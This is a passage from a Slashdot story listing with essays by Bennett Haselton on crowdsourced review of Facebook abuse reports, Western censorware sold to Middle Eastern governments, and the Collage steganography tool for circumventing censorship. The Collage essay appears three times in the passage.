    So, all very clever and interesting suggestions, some of which might inspire readers to keep coming up with their own further variations. I said which ideas I probably would have incorporated and which ones I wouldn't, and I'm sure many of you would tell me that I'm wrong on some of those points. Although from here on out you're doing it for free.

  5. Crowdsourcing the Censors: A Contest

    Tech · Social · · posted by Soulskill · from the people-love-to-vote dept. · 111 comments
    Frequent contributor Bennett Haselton is back with an article about how sites with huge amounts of user-generated content struggle to deal with abuse complaints, and could benefit from a crowd-sourced policing system similar to Slashdot's meta-moderation. He writes "In The Net Delusion, Evgeny Morozov cites examples of online mobs that filed phony abuse complaints in order to shut down pro-democracy Facebook groups and YouTube videos criticizing the Saudi royal family. I've got an idea for an algorithm that would help solve the problem, and I'm offering $100 (or a donation to a charity of your choice) for the best suggested improvement, or alternative, or criticism of the idea proposed in this article." Hit the link below to read the rest of his thoughts.

    Before you get bored and click away: I'm proposing an algorithm for Facebook (and similar sites) to use to review "abuse reports" in a scalable and efficient manner, and I'm offering a total of $100 (or more) to the reader (or to some charity designated by them) who proposes the best improvement(s) or alternative(s) to the algorithm. We now proceed with your standard boilerplate introductory paragraph.

    In his new book The Net Delusion: The Dark Side of Internet Freedom, Evgeny Morozov cites examples of Facebook users organizing campaigns to shut down particular groups or user account by filing phony complaints against them. One Hong-Kong-based Facebook group with over 80,000 members, formed to oppose the pro-Beijing Democratic Alliance for the Betterment and Progress of Hong-Kong, was shut down by opponents flagging the group as "abusive" on Facebook. In another incident, the Moroccan activist Kacem El Ghazzali found his Facebook group Youth for the Separation between Religion and Education deleted without explanation, and when he e-mailed Facebook to ask why, his personal Facebook profile got canned as well. Only after an international outcry did Facebook restore the group (but, oddly, not El Ghazzali's personal Facebook account), but they refused to explain the original removal; the most likely cause was a torrent of phony "complaints" from opponents. In both cases it seemed clear that the groups did not actually violate Facebook's Terms of Service, but the number of complaints presumably convinced either a software algorithm or an overworked human reviewer that something must have been inappropriate, and the forums were shut down. The Net Delusion also describes a group of conservative Saudi citizens calling themselves "Saudi Flagger" that coordinates filing en masse complaints against YouTube videos which criticize Islam or the Saudi royal family.

    A large number of abuse reports against a single Facebook group or YouTube video probably has a good chance of triggering a takedown; with 2,000 employees managing 500 million users, Facebook surely doesn't have time to review every abuse report properly. About once a month I still get an email from Facebook with the subject "Facebook Warning" saying:

    You have been sending harassing messages to other users. This is a violation of Facebook's Terms of Use. Among other things, messages that are hateful, threatening, or obscene are not allowed. Continued misuse of Facebook's features could result in your account being disabled.

    I still have no idea what is triggering the "warnings"; the meanest thing I usually say on Facebook is to people who write to me asking for tech support (usually with the proxy sites to get on Facebook at school), when they say "It gives me an error", and I write back, "TELL ME THE ACTUAL ERROR MESSAGE THAT IT GIVES YOU!!" (Typical reply: "It gave me an error that it can't do it." If you work in tech support, I feel your pain.) I suspect the "abuse reports" are probably coming from parents who hack into their teenagers' accounts, see their teens corresponding with me about how to get on Facebook or YouTube at school, and decide to file an "abuse report" against my account just for the hell of it. If Facebook makes it that easy for a lone gunman to cause trouble with fake complaints, imagine how much trouble you can make with a well-coordinated mob.

    But I think an algorithm could be implemented that would enable users to police for genuinely abusive content, without allowing hordes of vigilantes to get content removed that they simply don't like. Taking Facebook as an example, a simple change in the crowdsourcing algorithm could solve the whole problem: use the votes of users who are randomly selected by Facebook, rather than users who self-select by filing the abuse reports. This is similar to an algorithm I'd suggested for stopping vigilante campaigns from "burying" legitimate content on Digg (and indeed, stopping illegitimate self-promotion on Digg at the same time), and as an general algorithm for preventing good ideas from being lost in the glut of competing online content. But if phone "abuse reports" are also being used to squelch free speech in countries like China and Saudi Arabia, then the moral case for solving the problem is all that more compelling.

    Here's how the algorithm would work: Facebook can ask some random fraction of their users, "Would you like to be a volunteer reviewer of abuse reports?" (Would you sign up? Come on. Wouldn't you be a little bit curious what sort of interesting stuff would be brought to your attention?) Wait until they've built up a roster of reviewers (say, 20,000). Then suppose Facebook receives an abuse report (or several abuse reports, whatever their threshold is) about a particular Facebook group. Facebook can then randomly select some subset of its volunteer reviewers, say, 100 of them. This is tiny as a proportion of the total number of reviewers (with a "jury" size of 100 and a "jury pool" of 20,000, a given reviewer has only a 1 in 200 chance of being called for "jury duty" for any particular complaint), but still large enough that the results are statistically significant. Tell them, "This is the content that users have been complaining about, and here is the reason that they say it violates our terms of service. Are these legitimate complaints, or not?" If the number of "Yes" votes exceeds some threshold, then the group gets shuttered.

    It's much harder to cheat in this system, than in an "abuse report" system in which users simply band together and file phony abuse reports against a group until it gets taken down. If the 200 members of "Saudi Flagger" signed up as volunteer reviewers, then they would comprise only 1% of a jury pool of 20,000 users, and on average would only get one vote on a jury of 100. You'd have to organize such a large mob that your numbers would comprise a significant portion of the 20,000 volunteer reviewers, so that you would have a significant voting bloc in a given jury pool. (And my guess is that Facebook would have a lot more than 20,000 curious volunteers signed up as reviewers.) On the other hand, if someone creates a group with actual hateful content or built around a campaign of illegal harrassment, and the abuse reports start coming in until a jury vote is triggered, then a randomly selected jury of reviewers would probably cast enough "Yes" votes to validate the abuse reports.

    Jurors could in fact be given three voting choices:

    • "This group really is abusive" (i.e. the abuse reports were legitimate), or;
    • "This group does not technically violate the Terms of Service, but the users who filed abuse reports were probably making an honest mistake" (perhaps a common choice for groups that support controversial causes, or that publish information about semi-private individuals); or
    • "This group does not violate the TOS, and the abuse reports were bogus to begin with" (i.e. almost no reasonable person could have believed that the group really did violate the TOS, and the abuse reports were probably part of an organized campaign to get the group removed).

    This strongly discourages users from organizing mob efforts against legitimate groups; if most of the jury ends up voting for the third choice, "This is an obviously legitimate group and the complaints were just an organized vigilante campaign", then the users who filed the complaints could have their own accounts penalized.

    What I like about this algorithm is that the sizes and thresholds can be tweaked according to what you discover about the habits of the Facebook content reviewers. Suppose most volunteer reviewers turn out to be deadbeats who don't respond to "jury duty" when they're actually called upon to vote in an abuse report case. Fine — just increase the size of the jury, until the average number of users in a randomly convened jury who do respond, is large enough to be statistically significant. Or, suppose it turns out that people who sign up to review content to be deleted, are a more prudish bunch than average, and their votes tend to skew towards "delete it now!" in a way that is not representative of the general Facebook community. Fine — just raise the threshold for the percentage of "Yes" votes required to get content deleted. All that's required for the algorithm to work, is that content which clearly does violate the Terms of Service, gets more "Yes" votes on average than content that doesn't. Then make the jury size large enough that the voting results are statistically significant, so you can tell which side of the threshold you're on.

    Another beneficial feature of the algorithm is that it's scaleable — there's no bottleneck of overworked reviewers at Facebook headquarters who have to review every decision. (They should probably review a random subset of the decisions to make sure the "juries" are getting what seems to be the right answer, but they don't have to check every one.) If Facebook doubles in size — and the amount of "abusive content" and the number of abuse reports doubles along with it — then as long as the pool of volunteers reviewers also doubles, each reviewer has no greater workload than they had before. But the workload of the abuse department at Facebook doesn't double.

    Now, this algorithm ducks the question of how to handle "borderline" content. If a student creates a Facebook group called "MR. LANGAN IS A BUTT BRAIN," is that "harassment" or not? I would say no, but I'm not confident that a randomly selected pool of reviewers would agree. However, the point of this algorithm is to make sure that if content is posted on Facebook that almost nobody would reasonably agree is a violation of their Terms of Service, then a group of vigilantes can't get it removed by filing a torrent of abuse reports.

    Also, this proposal can't do much about Facebook's Terms of Service being prudish to begin with. A Frenchman recently had his account suspended because he used a 19th-century oil painting of an artistic nude as his profile picture. Well, Facebook's TOS prohibits nudity -- not just sexual nudity, but all nudity, period. Even under my proposed algorithm, jurors would presumably have to be honest and vote that the painting did in fact violate Facebook's TOS, unless or until Facebook changes the rules. (For that matter, maybe this wasn't a case of prudishness anyway. I mean, we know it's "artistic" because it's more than 100 years old and it was painted in oils, right? Yeah, well check out the painting that the guy used as his profile picture. It presumably didn't help that the painting is so good that the Facebook censors probably thought it was a photograph.)

    But notwithstanding these problems, this algorithm was the best trade-off I could come up with in terms of scalability and fairness. So here's the contest: Send me your best alternative, or best suggested improvement, or best fatal flaw in this proposal (even if you don't come up with something better, the discovery of a fatal flaw is still valuable) for a chance to win (a portion of) the $100 -- or, you can designate a charity to be the recipient of your winnings. Send your ideas to bennett at peacefire dot org and put "reporting" in the subject line. I reserve the right to split the prize between multiple winners, or to pay out more than the original $100 (or give winners the right to designate charitable donations totalling more than $100) if enough good points come in (or to pay out less than $100 if there's a real dearth of valid points, but there are enough brainiacs reading this that I think that's unlikely). In order for the contest not to detract from the discussion taking place in the comment threads, if more than one reader submits essentially the same idea, I'll give the credit to the first submitter -- so as you're sending me your idea, you can feel free to share it in the comment threads as well without worrying about someone re-submitting it and stealing a portion of your winnings. (If your submission is, "Bennett, your articles would be much shorter if you just state your conclusion, instead of also including a supporting argument and addressing possible objections", feel free to submit that just in the comment threads.)

    In The Net Delusion, Morozov concludes his section on phony abuse reports by saying, "Good judgment, as it turns out, cannot be crowdsourced, if only because special interests always steer the process to suit their own objectives." I think he's right about the problems, but I disagree that they're unsolvable. I think my algorithm does in fact prevent "special interests" from "steering the process", but I'll pay to be convinced that I'm wrong. Today I'm just choosing the "winners" of the contest myself; maybe someday I'll crowdsource the decision by letting a randomly selected subset of users vote on the merits of each proposal... but I'm sure some of you are dying to tell me why that's a bad idea.

  6. Censorware Vendors Can Stop Mid-East Dealings

    Yro · Censorship · · posted by CmdrTaco · from the guess-who's-back dept. · 126 comments
    Slashdot regular Bennett Haselton is back with a story about Internet censorship in the Middle East. Several blocking software companies claimed that they had no control over how various Middle Eastern governments used their software. Bennett says it's time to put this patently false claim to rest. American censorware companies could easily cut off Middle Eastern governments from using their software, and thus make their existing filtering systems far less effective; they just refuse to do it. Hit the link below to see what he has to say, and make up your own mind.

    The Wall Street Journal published an article Monday listing the Western-made Internet censoring programs used by several Middle Eastern governments, in countries that filter what their citizens can access on the Web. Like a similar 2011 report from the OpenNet Initiative, hopefully this listing will shine a spotlight on the problem, and make it easier for human rights groups to call for these companies to stop aiding censorious governments.

    However, I wish that the article had quoted someone giving a rebuttal to the several companies which claimed, "Once the customer buys the product, we have no control over it," as stated variously Netsweeper, Blue Coat, and McAfee (which makes Smartfilter). For a product that relies on continuous updates provided by the software company, this claim, of course, is nonsense. Unfortunately, the claim seems to go unchallenged so often, that there's a risk that it will start to affect policy -- people may believe that we can't regulate how American censorware is used by repressive countries, so we shouldn't even try.

    Some background: When a customer buys a standard network filtering program like Websense, SmartFilter, or Blue Coat, the product comes with a built-in list of websites to be blocked by the software. (The customer can select or de-select categories of sites to be blocked, like "pornography" or "gambling".) The purchase of the software typically comes with a year or two of free updates to the blocked-site list. The software vendors employs a combination of human reviewers and (more often) automated crawlers to scour the Web looking for new sites that fall into their categories, and add these sites to their database. Customers who are within their subscription period can download periodic updates to this blocked-site list. After a customer's initial free subscription period runs out, they can opt to continue purchasing updates to the database. If they don't, then the product will continue to work, but the blocked-site list will be frozen (except for any new sites that the customer finds on their own and adds manually to their own blocked-site list).

    Once the blocked-site list is frozen, the filtering product becomes ineffective against any user making a serious effort to get around it. This is because there are many mailing lists like mine that mail out new proxy sites every week (a proxy site is a site which contains a form that allows the user to access third-party Web sites indirectly, usually to circumvent Internet blocking). And as long as the user can access at least one unblocked proxy site, they can access any other blocked site by going through the proxy. So when a censorious regime stops updating their blocked-site list, the product becomes ineffective almost immediately. (For that, I suppose, the blocking companies should be grateful to us proxy site makers, since we make it necessary for their customers to keep renewing their blocked-site subscriptions year after year.)

    So, even if one were to accept the (highly dubious) claim that the software vendors didn't realize what was going on when a foreign government approached them to buy their software, once they realize that their software is being used to violate the rights of the country's people, they can easily stop providing updates to that customer. This can be done by either (a) blocking the IP addresses that the customer uses to download the updates, or (b) blocking any further updates using that customer's license key. (Each installation of a blocking program like Websense comes with a license key unique to that customer, and the program has to submit the license key to the download server in order to download the latest update to the blocked-site list. If the customer's subscription runs out or gets cancelled, no more updates.)

    This is roughly the situation that exists in Iran. The Iranian government claims to use McAfee's Smartfilter to filter Internet access for their citizens, despite McAfee's claim that they don't sell to Iran because of the embargo. But the evidence suggests that while Iran may have once acquired Smartfilter along with a copy of their filter list that was current at the time, they're not getting regular updates to the blocked-site list. From corresponding with Iranians and testing the filter through a server located inside Iran, I've found that most of the proxy sites we mail out never get blocked at all in Iran, even as they eventually get blocked in countries like Bahrain and Kuwait that are using Smartfilter with a subscription to the blocked-site database. The proxy sites we mail out that do get blocked in Iran are usually blocked a few days later than they are in Bahrain and Kuwait. This suggests that the Iranian censors are finding and blocking new proxy sites by ad hoc methods, and that they're not as effective at it as American censorware companies. So the Iranian situation proves two points: that Western blocking companies really can prevent a foreign government from using their products (well, duh), and that this restriction actually works, in the sense of making the country's filter less effective.

    So when a McAfee spokesman told the WSJ reporters, "You can add additional websites to the block list; obviously what an individual customer would do with a product once they acquire it is beyond our control," that's true only in the most literal sense. Yes, Bahrain can add human rights web pages to their list of sites blocked by Smartfilter, and McAfee can't stop them, but the effectiveness of this block depends on the Bahrani censors using Smartfilter to block new proxy sites as well, which McAfee continues to aid them in doing, as a matter of choice.

    Websense, incidentally, announced in 2009 -- in response to an earlier ONI report describing how their software was used to censor Internet access in Yemen -- that they would stop providing censoring software to the Yemeni government. But ONI's current report claims that the Yemeni government continued to use Websense into 2011, and Websense declined to comment. Maybe the Yemeni government was using Websense with a "frozen blocked-site list" -- but the ONI report includes at least one instance where a site that was un-blocked by Websense (the opennet.net domain itself!) became un-blocked in Yemen shortly afterwards. So maybe Websense just lied about canceling the Yemenis' license.

    Could some censorious country like Yemen continue using the Websense filter -- with a continuously updated blocked-site list -- even after Websense truly tried to cut them off? Possibly, but it would probably be more trouble than it's worth. Yemen would have to set up a shell company outside of their own borders, with an overseas bank account, in order to purchase the software. Then after Yemen had installed Websense on their servers, they would have to download the updates indirectly by going through an anonymizing proxy set up in some other country as well. And if Websense ever found out which of their customers was a shell company used by the Yemeni government, they could cut off that customer's license, and the Yemeni censors would have to start all over again. It's probably safe to say that most Middle Eastern countries wouldn't find this worth the trouble. (After all, Iran could do everything I've just described, but apparently they haven't; they still seem to be using Smartfilter with an outdated copy of the blocked-site list, and adding new proxy sites to their blacklist manually.)

    So far, proposals to ban American censorware companies from selling to foreign governments have not gotten off the ground -- and now with several Middle Eastern countries using or looking at Netsweeper, we'd have to get Canada on board as well. But at the very least, let's start calling out censorware companies on the canard that "We just sell the software and have no way of controlling who uses it." The companies know that foreign governments are using it to censor their own people, and they can cut them off as customers any time they want to; they just don't.

  7. Collage, and the Challenge of "Deniability"

    Tech · Censorship · · posted by samzenpus · from the on-the-down-low dept. · 94 comments
    Slashdot regular Bennett Haselton has written a piece on a new program called Collage that can circumvent censorship by embedding messages in user-generated content on sites like Flickr. The program demonstrates that a long-standing theoretical concept can be reduced to practice but Bennett wonders if anybody would actually need it, as long as they can exchange encrypted messages over Gmail and AIM. He begins "In a presentation delivered at USENIX, Georgia Tech grad student Sam Burnett and his colleagues described how their new program, "Collage," could circumvent Internet censorship by embedding messages in user-generated content on sites like Flickr. The short version is that a publisher uses the Collage system to break a message into pieces that are small enough to embed into a photograph using standard steganography, the photos are published according to some protocol (e.g. "all photos in the photostream of user xyz" or "all photos tagged with the 'xyz' tag"), and receivers who know the protocol for identifying the photos, can retrieve them and decode the message. According to the authors' paper, the system is general enough that it could be adapted to almost any site where user-generated content is published. (All of this can be done by hand using existing tools, but Collage automates the process to hide the individual steps from the user.)" From this short description, you can see the two salient facts about Collage: (1) it's robust, in the sense that in order to shut it down completely, the censor would have to block every site containing user-generated content; and (2) it's efficient only for small text messages (which is what the authors used to test it), and not for high-bandwidth communications such as video. The authors have also highlighted the claim that Collage is (3) deniable, in the sense that in using it, you won't attract the attention of the censors for browsing "innocent" sites like Flickr. On this point, I'm not so sure; I think it's highly dependent on the kinds of publication system that the sender and the recipient agree on. For example, if the sender publishes their messages in photos all in one user's photostream, and that photostream is used primarily by recipients in censored countries to receive encoded messages, and if virtually nobody ever visits that photostream for any other reason, then if the censor ever finds out about that photostream, they could flag any user who ever visits it. It doesn't matter if the "site" as a whole is "innocent", if that one user's photostream is not.

    But there's a more fundamental issue: Currently, in all censored countries, there is at least one way to receive prohibited text messages more efficiently (and with greater deniability) than with Collage. So Collage may work perfectly, but even when it gets released, I'd be very surprised to see large numbers of people using it unless all the simpler alternatives get blocked.

    Most tools that people use to circumvent Internet censorship, are not "deniable" in the sense described above. If you visit a proxy site like VTunnel, any censor who is monitoring your Internet connection can see that you connected to a known proxy site. If you connect to the proxy site using "https://" instead of "http://", then a censor eavesdropping on your connection, won't be able to tell what you looked at through the proxy site (unless they confiscate your computer and look through your browser history), but they'll still be able to tell that you visited a proxy site. Similarly, if you use a tool like UltraSurf or Tor, those tools can circumvent the censor's filters by re-routing your Internet connection through a server outside the censored country -- but a censor monitoring your traffic, can still see that you connected to an UltraSurf or Tor server outside the country, even if they can't tell what Web sites you were visiting.

    But if all you want is to receive short text messages, then there are many options that are completely "deniable." The simplest is probably to use Gmail and to choose the option to always read messages over https://. (If you sign in to Gmail, under "Settings" you can choose between "Always use https" and "Don't always use https".) If you read your inbox contents using https, then a censor eavesdropping on your connection can't see anything at all -- not the contents of messages that people send you, not the email addresses of people who are writing to you, not even the username that you use to sign in to read your Gmail messages. This gives you more or less perfectly deniability. As long as many Gmail users are using Gmail over https://, then doing this by itself would not attract undue attention from censors monitoring your Internet traffic. Using Gmail, you could also exchange higher-bandwidth content like images and video (up to Gmail's attachment size limit, currently 25 megabytes), something not possible with Collage.

    Of course, if you remember the case in which Yahoo turned over information about one of its Chinese account-holders to the Chinese government (who subsequently arrested the user and sentenced them to 10 years in prison), you may be wary of trusting any Western corporation with your privacy. But in this case, you wouldn't have to. Because even if the Chinese government found out that some Gmail users were using Gmail to receive anti-government messages from the U.S., the censors wouldn't be able to eavesdrop on https-protected connections to find out which users were receiving the messages or what they said, so there would be no information for them to demand that Google turn over to them.

    Or if you want to exchange encrypted text messages in real time, you can use any instant messaging client that supports encryption. Whether or not this is "deniable", in the sense of not attracting undue attention for "suspicious activity", depends on what proportion of other users are using the chat program in encrypted mode as well. The current version of AOL Instant Messenger, for example, apparently encrypts all instant messages by default. (Although you should take care to understand exactly what is "encrypted" when using an instant messaging client. In my experiments, when using AOL Instant Messenger, the contents of messages were encrypted, but the specific screen names that you're sending and receiving messages from, are not. In other words, a censor eavesdropping on your traffic, can see which screen names you exchanged messages with, but not the message contents. So if there were an AOL user account in a non-censored country that was a dummy account used primarily for passing banned information to users in censored countries, then if the censors ever found out about that account, they could flag and investigate any user in their country who exchanged messages with that screen name.)

    The bottom line is that as long as at least one of these alternatives remains unblocked in your country, they would serve as an easier way to achieve the same goals that Collage achieves. They're generally faster, more convenient, and most of the time, more "deniable", in the sense that the traffic they generate won't look as suspicious as, say, browsing a Flickr feed that later becomes widely known as source of banned encoded messages. Collage does demonstrate that an interesting idea can be reduced to practice, and is robust in the sense that the general scheme cannot be blocked unless a regime blocks access to every site hosting user-submitted content. But there doesn't seem to be a compelling reason to use it unless and until all of the simpler methods get blocked.

    I write all of this as someone who also wrote a program a few years ago that was meant to serve as a more robust back-up, in case a more popular method of circumventing censorship ever got shut down by the censors. In my case, I thought that most censoring regimes would start blocking all popular Web proxy sites, so I wrote an install script called "Circumventor" that would let you set up a Web server and James Marshall's CGIProxy script on your home computer, turning it into a mini-Web-proxy site. I assumed that eventually, most people in censored countries would have to rely on someone in a non-censored country to set up a private Web proxy like this and e-mail them the URL, once China and Iran got their act together and started blocking most publicly known Web proxy sites. But that never happened, partly because Web proxy sites are now springing up faster than most censors' databases can keep up with. So the web proxy install script fell by the wayside -- but that's good news, because it means that nobody really needed it, since the simpler, more straightforward methods continued to work. Why pester your cousin in the U.S. to set up a Web proxy for you, when most Web proxies you can find in Google are not even blocked yet?

    And so it goes for Collage. It sounds like a perfectly fine idea, and it will be great news all around if nobody ever actually has to use it, because the censors never get around to blocking all of the simpler alternatives.

  8. Collage, and the Challenge of "Deniability"

    Tech · Censorship · · posted by samzenpus · from the on-the-down-low dept. · 94 comments
    Slashdot regular Bennett Haselton has written a piece on a new program called Collage that can circumvent censorship by embedding messages in user-generated content on sites like Flickr. The program demonstrates that a long-standing theoretical concept can be reduced to practice but Bennett wonders if anybody would actually need it, as long as they can exchange encrypted messages over Gmail and AIM. He begins "In a presentation delivered at USENIX, Georgia Tech grad student Sam Burnett and his colleagues described how their new program, "Collage," could circumvent Internet censorship by embedding messages in user-generated content on sites like Flickr. The short version is that a publisher uses the Collage system to break a message into pieces that are small enough to embed into a photograph using standard steganography, the photos are published according to some protocol (e.g. "all photos in the photostream of user xyz" or "all photos tagged with the 'xyz' tag"), and receivers who know the protocol for identifying the photos, can retrieve them and decode the message. According to the authors' paper, the system is general enough that it could be adapted to almost any site where user-generated content is published. (All of this can be done by hand using existing tools, but Collage automates the process to hide the individual steps from the user.)" From this short description, you can see the two salient facts about Collage: (1) it's robust, in the sense that in order to shut it down completely, the censor would have to block every site containing user-generated content; and (2) it's efficient only for small text messages (which is what the authors used to test it), and not for high-bandwidth communications such as video. The authors have also highlighted the claim that Collage is (3) deniable, in the sense that in using it, you won't attract the attention of the censors for browsing "innocent" sites like Flickr. On this point, I'm not so sure; I think it's highly dependent on the kinds of publication system that the sender and the recipient agree on. For example, if the sender publishes their messages in photos all in one user's photostream, and that photostream is used primarily by recipients in censored countries to receive encoded messages, and if virtually nobody ever visits that photostream for any other reason, then if the censor ever finds out about that photostream, they could flag any user who ever visits it. It doesn't matter if the "site" as a whole is "innocent", if that one user's photostream is not.

    But there's a more fundamental issue: Currently, in all censored countries, there is at least one way to receive prohibited text messages more efficiently (and with greater deniability) than with Collage. So Collage may work perfectly, but even when it gets released, I'd be very surprised to see large numbers of people using it unless all the simpler alternatives get blocked.

    Most tools that people use to circumvent Internet censorship, are not "deniable" in the sense described above. If you visit a proxy site like VTunnel, any censor who is monitoring your Internet connection can see that you connected to a known proxy site. If you connect to the proxy site using "https://" instead of "http://", then a censor eavesdropping on your connection, won't be able to tell what you looked at through the proxy site (unless they confiscate your computer and look through your browser history), but they'll still be able to tell that you visited a proxy site. Similarly, if you use a tool like UltraSurf or Tor, those tools can circumvent the censor's filters by re-routing your Internet connection through a server outside the censored country -- but a censor monitoring your traffic, can still see that you connected to an UltraSurf or Tor server outside the country, even if they can't tell what Web sites you were visiting.

    But if all you want is to receive short text messages, then there are many options that are completely "deniable." The simplest is probably to use Gmail and to choose the option to always read messages over https://. (If you sign in to Gmail, under "Settings" you can choose between "Always use https" and "Don't always use https".) If you read your inbox contents using https, then a censor eavesdropping on your connection can't see anything at all -- not the contents of messages that people send you, not the email addresses of people who are writing to you, not even the username that you use to sign in to read your Gmail messages. This gives you more or less perfectly deniability. As long as many Gmail users are using Gmail over https://, then doing this by itself would not attract undue attention from censors monitoring your Internet traffic. Using Gmail, you could also exchange higher-bandwidth content like images and video (up to Gmail's attachment size limit, currently 25 megabytes), something not possible with Collage.

    Of course, if you remember the case in which Yahoo turned over information about one of its Chinese account-holders to the Chinese government (who subsequently arrested the user and sentenced them to 10 years in prison), you may be wary of trusting any Western corporation with your privacy. But in this case, you wouldn't have to. Because even if the Chinese government found out that some Gmail users were using Gmail to receive anti-government messages from the U.S., the censors wouldn't be able to eavesdrop on https-protected connections to find out which users were receiving the messages or what they said, so there would be no information for them to demand that Google turn over to them.

    Or if you want to exchange encrypted text messages in real time, you can use any instant messaging client that supports encryption. Whether or not this is "deniable", in the sense of not attracting undue attention for "suspicious activity", depends on what proportion of other users are using the chat program in encrypted mode as well. The current version of AOL Instant Messenger, for example, apparently encrypts all instant messages by default. (Although you should take care to understand exactly what is "encrypted" when using an instant messaging client. In my experiments, when using AOL Instant Messenger, the contents of messages were encrypted, but the specific screen names that you're sending and receiving messages from, are not. In other words, a censor eavesdropping on your traffic, can see which screen names you exchanged messages with, but not the message contents. So if there were an AOL user account in a non-censored country that was a dummy account used primarily for passing banned information to users in censored countries, then if the censors ever found out about that account, they could flag and investigate any user in their country who exchanged messages with that screen name.)

    The bottom line is that as long as at least one of these alternatives remains unblocked in your country, they would serve as an easier way to achieve the same goals that Collage achieves. They're generally faster, more convenient, and most of the time, more "deniable", in the sense that the traffic they generate won't look as suspicious as, say, browsing a Flickr feed that later becomes widely known as source of banned encoded messages. Collage does demonstrate that an interesting idea can be reduced to practice, and is robust in the sense that the general scheme cannot be blocked unless a regime blocks access to every site hosting user-submitted content. But there doesn't seem to be a compelling reason to use it unless and until all of the simpler methods get blocked.

    I write all of this as someone who also wrote a program a few years ago that was meant to serve as a more robust back-up, in case a more popular method of circumventing censorship ever got shut down by the censors. In my case, I thought that most censoring regimes would start blocking all popular Web proxy sites, so I wrote an install script called "Circumventor" that would let you set up a Web server and James Marshall's CGIProxy script on your home computer, turning it into a mini-Web-proxy site. I assumed that eventually, most people in censored countries would have to rely on someone in a non-censored country to set up a private Web proxy like this and e-mail them the URL, once China and Iran got their act together and started blocking most publicly known Web proxy sites. But that never happened, partly because Web proxy sites are now springing up faster than most censors' databases can keep up with. So the web proxy install script fell by the wayside -- but that's good news, because it means that nobody really needed it, since the simpler, more straightforward methods continued to work. Why pester your cousin in the U.S. to set up a Web proxy for you, when most Web proxies you can find in Google are not even blocked yet?

    And so it goes for Collage. It sounds like a perfectly fine idea, and it will be great news all around if nobody ever actually has to use it, because the censors never get around to blocking all of the simpler alternatives.

  9. Collage, and the Challenge of "Deniability"

    Tech · Censorship · · posted by samzenpus · from the on-the-down-low dept. · 94 comments
    Slashdot regular Bennett Haselton has written a piece on a new program called Collage that can circumvent censorship by embedding messages in user-generated content on sites like Flickr. The program demonstrates that a long-standing theoretical concept can be reduced to practice but Bennett wonders if anybody would actually need it, as long as they can exchange encrypted messages over Gmail and AIM. He begins "In a presentation delivered at USENIX, Georgia Tech grad student Sam Burnett and his colleagues described how their new program, "Collage," could circumvent Internet censorship by embedding messages in user-generated content on sites like Flickr. The short version is that a publisher uses the Collage system to break a message into pieces that are small enough to embed into a photograph using standard steganography, the photos are published according to some protocol (e.g. "all photos in the photostream of user xyz" or "all photos tagged with the 'xyz' tag"), and receivers who know the protocol for identifying the photos, can retrieve them and decode the message. According to the authors' paper, the system is general enough that it could be adapted to almost any site where user-generated content is published. (All of this can be done by hand using existing tools, but Collage automates the process to hide the individual steps from the user.)" From this short description, you can see the two salient facts about Collage: (1) it's robust, in the sense that in order to shut it down completely, the censor would have to block every site containing user-generated content; and (2) it's efficient only for small text messages (which is what the authors used to test it), and not for high-bandwidth communications such as video. The authors have also highlighted the claim that Collage is (3) deniable, in the sense that in using it, you won't attract the attention of the censors for browsing "innocent" sites like Flickr. On this point, I'm not so sure; I think it's highly dependent on the kinds of publication system that the sender and the recipient agree on. For example, if the sender publishes their messages in photos all in one user's photostream, and that photostream is used primarily by recipients in censored countries to receive encoded messages, and if virtually nobody ever visits that photostream for any other reason, then if the censor ever finds out about that photostream, they could flag any user who ever visits it. It doesn't matter if the "site" as a whole is "innocent", if that one user's photostream is not.

    But there's a more fundamental issue: Currently, in all censored countries, there is at least one way to receive prohibited text messages more efficiently (and with greater deniability) than with Collage. So Collage may work perfectly, but even when it gets released, I'd be very surprised to see large numbers of people using it unless all the simpler alternatives get blocked.

    Most tools that people use to circumvent Internet censorship, are not "deniable" in the sense described above. If you visit a proxy site like VTunnel, any censor who is monitoring your Internet connection can see that you connected to a known proxy site. If you connect to the proxy site using "https://" instead of "http://", then a censor eavesdropping on your connection, won't be able to tell what you looked at through the proxy site (unless they confiscate your computer and look through your browser history), but they'll still be able to tell that you visited a proxy site. Similarly, if you use a tool like UltraSurf or Tor, those tools can circumvent the censor's filters by re-routing your Internet connection through a server outside the censored country -- but a censor monitoring your traffic, can still see that you connected to an UltraSurf or Tor server outside the country, even if they can't tell what Web sites you were visiting.

    But if all you want is to receive short text messages, then there are many options that are completely "deniable." The simplest is probably to use Gmail and to choose the option to always read messages over https://. (If you sign in to Gmail, under "Settings" you can choose between "Always use https" and "Don't always use https".) If you read your inbox contents using https, then a censor eavesdropping on your connection can't see anything at all -- not the contents of messages that people send you, not the email addresses of people who are writing to you, not even the username that you use to sign in to read your Gmail messages. This gives you more or less perfectly deniability. As long as many Gmail users are using Gmail over https://, then doing this by itself would not attract undue attention from censors monitoring your Internet traffic. Using Gmail, you could also exchange higher-bandwidth content like images and video (up to Gmail's attachment size limit, currently 25 megabytes), something not possible with Collage.

    Of course, if you remember the case in which Yahoo turned over information about one of its Chinese account-holders to the Chinese government (who subsequently arrested the user and sentenced them to 10 years in prison), you may be wary of trusting any Western corporation with your privacy. But in this case, you wouldn't have to. Because even if the Chinese government found out that some Gmail users were using Gmail to receive anti-government messages from the U.S., the censors wouldn't be able to eavesdrop on https-protected connections to find out which users were receiving the messages or what they said, so there would be no information for them to demand that Google turn over to them.

    Or if you want to exchange encrypted text messages in real time, you can use any instant messaging client that supports encryption. Whether or not this is "deniable", in the sense of not attracting undue attention for "suspicious activity", depends on what proportion of other users are using the chat program in encrypted mode as well. The current version of AOL Instant Messenger, for example, apparently encrypts all instant messages by default. (Although you should take care to understand exactly what is "encrypted" when using an instant messaging client. In my experiments, when using AOL Instant Messenger, the contents of messages were encrypted, but the specific screen names that you're sending and receiving messages from, are not. In other words, a censor eavesdropping on your traffic, can see which screen names you exchanged messages with, but not the message contents. So if there were an AOL user account in a non-censored country that was a dummy account used primarily for passing banned information to users in censored countries, then if the censors ever found out about that account, they could flag and investigate any user in their country who exchanged messages with that screen name.)

    The bottom line is that as long as at least one of these alternatives remains unblocked in your country, they would serve as an easier way to achieve the same goals that Collage achieves. They're generally faster, more convenient, and most of the time, more "deniable", in the sense that the traffic they generate won't look as suspicious as, say, browsing a Flickr feed that later becomes widely known as source of banned encoded messages. Collage does demonstrate that an interesting idea can be reduced to practice, and is robust in the sense that the general scheme cannot be blocked unless a regime blocks access to every site hosting user-submitted content. But there doesn't seem to be a compelling reason to use it unless and until all of the simpler methods get blocked.

